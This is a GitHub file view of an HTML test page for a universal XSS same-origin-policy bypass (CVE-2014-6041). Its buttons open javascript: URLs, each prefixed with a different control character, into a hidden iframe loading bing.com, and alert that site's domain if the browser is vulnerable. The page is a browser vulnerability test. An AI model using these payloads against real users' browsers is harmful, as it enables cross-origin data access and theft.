-
Notifications
You must be signed in to change notification settings - Fork 11
/
Copy pathtest8.html
80 lines (70 loc) · 4.22 KB
/
test8.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
<html>
<head>
<title>Universal XSS (UXSS) SOP Bypass Vulnerability test</title>
<style type="text/css">
*{margin:0;padding:0;}
.wrapper {
width: 95%;
background-color: #16a085;
margin: 0 auto;
font-family: times new roman;
height: 120%;
}
.line {
background-color: #ecf0f1;
text-align: center;
padding: 10px;
color: #16a085;;
}
.main {
color: #fff;
padding: 10px;
}
.test {
width: 200px;
height: 40px;
background-color: #fff;
border: none;
border-radius: 100px;
color: #16a085;
font-size: 1.6em;
margin: 0 auto;
}
.note {
background: #1abc9c;
color: #fff;
padding: 10px;
width: 95%;
margin: 0 auto;
margin-top: 40px;
}
</style>
</head>
<body>
<iframe height="0" width="0" name="CVE-2014-6041" src="http://www.bing.com" style="display:none;"></iframe>
<div class="wrapper">
<img src="and.png">
<h3 class="line">SOP Bypass - Testcase 8</h3>
<div class="main">
<p>Modified version of CVE-2014-6041 for testing other control characters</p>
</div>
<center> <input type="button" id="btn_test" class="test" value="Run Test Case 1" onclick="window.open('\u0000javascript:test=\'Accessed property of \'+document.domain+\'. Your browser is vulnerable to UXSS\'; alert(test);','CVE-2014-6041');" /></center>
</br> <center> <input type="button" id="btn_test" class="test" value="Run Test Case 2" onclick="window.open('\u000ajavascript:test=\'Accessed property of \'+document.domain+\'. Your browser is vulnerable to UXSS\'; alert(test);','CVE-2014-6041');" /></center>
</br><center> <input type="button" id="btn_test" class="test" value="Run Test Case 3" onclick="window.open('\u000bjavascript:test=\'Accessed property of \'+document.domain+\'. Your browser is vulnerable to UXSS\'; alert(test);','CVE-2014-6041');" /></center>
</br><center> <input type="button" id="btn_test" class="test" value="Run Test Case 4" onclick="window.open('\u000cjavascript:test=\'Accessed property of \'+document.domain+\'. Your browser is vulnerable to UXSS\'; alert(test);','CVE-2014-6041');" /></center>
</br><center> <input type="button" id="btn_test" class="test" value="Run Test Case 5" onclick="window.open('\u000djavascript:test=\'Accessed property of \'+document.domain+\'. Your browser is vulnerable to UXSS\'; alert(test);','CVE-2014-6041');" /></center>
</br><center> <input type="button" id="btn_test" class="test" value="Run Test Case 6" onclick="window.open('\u0020javascript:test=\'Accessed property of \'+document.domain+\'. Your browser is vulnerable to UXSS\'; alert(test);','CVE-2014-6041');" /></center>
</br><center> <input type="button" id="btn_test" class="test" value="Run Test Case 6" onclick="window.open('\u002Cjavascript:test=\'Accessed property of \'+document.domain+\'. Your browser is vulnerable to UXSS\'; alert(test);','CVE-2014-6041');" /></center>
</br><center> <input type="button" id="btn_test" class="test" value="Run Test Case 7" onclick="window.open('\u003Bjavascript:test=\'Accessed property of \'+document.domain+\'. Your browser is vulnerable to UXSS\'; alert(test);','CVE-2014-6041');" /></center>
</br><center> <input type="button" id="btn_test" class="test" value="Run Test Case 8" onclick="window.open('\u0009javascript:test=\'Accessed property of \'+document.domain+\'. Your browser is vulnerable to UXSS\'; alert(test);','CVE-2014-6041');" /></center>
</br><center> <input type="button" id="btn_test" class="test" value="Run Test Case 9" onclick="window.open('\u002Bjavascript:test=\'Accessed property of \'+document.domain+\'. Your browser is vulnerable to UXSS\'; alert(test);','CVE-2014-6041');" /></center>
</br><center> <input type="button" id="btn_test" class="test" value="Run Test Case 10" onclick="window.open('\u0028javascript:test=\'Accessed property of \'+document.domain+\'. Your browser is vulnerable to UXSS\'; alert(test);','CVE-2014-6041');" /></center>
</br></br>
<div class="note">
<p><strong>Note:</strong> <br />
If page loads popup and displays a alert box "Accessed Property of bing.com, your browser is vulnerable to SOP bypass "
</p>
</div>
</div>
</body>
</html>